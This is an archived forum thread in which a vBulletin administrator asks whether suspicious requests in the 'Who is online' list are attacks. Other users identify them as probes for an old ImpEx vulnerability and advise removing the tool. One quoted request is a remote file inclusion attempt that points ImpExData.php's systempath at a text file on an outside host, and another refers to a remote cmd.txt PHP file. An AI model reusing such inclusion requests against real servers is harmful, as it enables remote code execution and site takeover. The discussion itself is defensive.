Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 Programming Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 10-14-2007, 08:20 PM
FoReX FoReX is offline
 
Join Date: Jun 2007
Posts: 20
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default is this hacker's method?

While i see Who is online page, i saw this link one quest.

http://................................temap/cmd.txt?

http://www.cpper.com/c/vbgsitemap/cmd.txt file include php code..

is this codes harmful? or hackers method?
Reply With Quote
  #2  
Old 10-15-2007, 06:26 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.
Reply With Quote
  #3  
Old 10-15-2007, 07:47 AM
FoReX FoReX is offline
 
Join Date: Jun 2007
Posts: 20
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Marco van Herwaarden View Post
It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.
Thanks marco..

I'm using Vbulletin 3.6.8 and vBadvanced CMPS v3.0 RC1.

can i need any update?
Reply With Quote
  #4  
Old 10-15-2007, 07:57 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

You are already running the latest vBulletin. Just make sure you don't have an old (remove or upgrade if needed) of ImpEx on your server.

I don't know about vBadvanced, but the attempt was not addressing vBA.
Reply With Quote
  #5  
Old 10-15-2007, 10:34 AM
FoReX FoReX is offline
 
Join Date: Jun 2007
Posts: 20
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I saw again smiliar links:
Quote:
..................com/forum.php/impex/clientscript/vbulletin_read_marker.js?v=368
and
Quote:
.........................com/forum.php//impex/ImpExData.php? systempath=http://futurehousingsystems.com/images/control.txt?
if this links harmfull or hackers method we will happy your report ...
Reply With Quote
  #6  
Old 10-15-2007, 11:02 AM
ragtek ragtek is offline
 
Join Date: Mar 2006
Location: austria, croatia
Posts: 1,630
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

if you havent "installed" impex(removed it after importing) nothing can happen
Reply With Quote
  #7  
Old 10-15-2007, 11:21 AM
nexialys
Guest
 
Posts: n/a
Default

the person/robot who visit your site with this script is someone willing to verify if you have ImpEx installed... lately, there was some insert/exploits compromissing the presence of ImpEx in your forum... btw, you should be safe as you do not have it installed.
Reply With Quote
  #8  
Old 10-15-2007, 12:05 PM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

lately??

The latest vulnerability in ImpEx was a 1-time error i think over a year ago. See also https://vborg.vbsupport.ru/showpost....7&postcount=13
Reply With Quote
  #9  
Old 10-15-2007, 12:23 PM
nexialys
Guest
 
Posts: n/a
Default

lately can be one year old, remember that people are not updating their ImpEx the same way they change their underwears...
Reply With Quote
  #10  
Old 10-15-2007, 06:54 PM
Analogpoint's Avatar
Analogpoint Analogpoint is offline
 
Join Date: Feb 2007
Posts: 656
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

In any case, you shouldn't have impex on your server unless you're actively importing or exporting something. If not, remove it.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 07:15 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.06666 seconds
  • Memory Usage 2,240KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (8)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete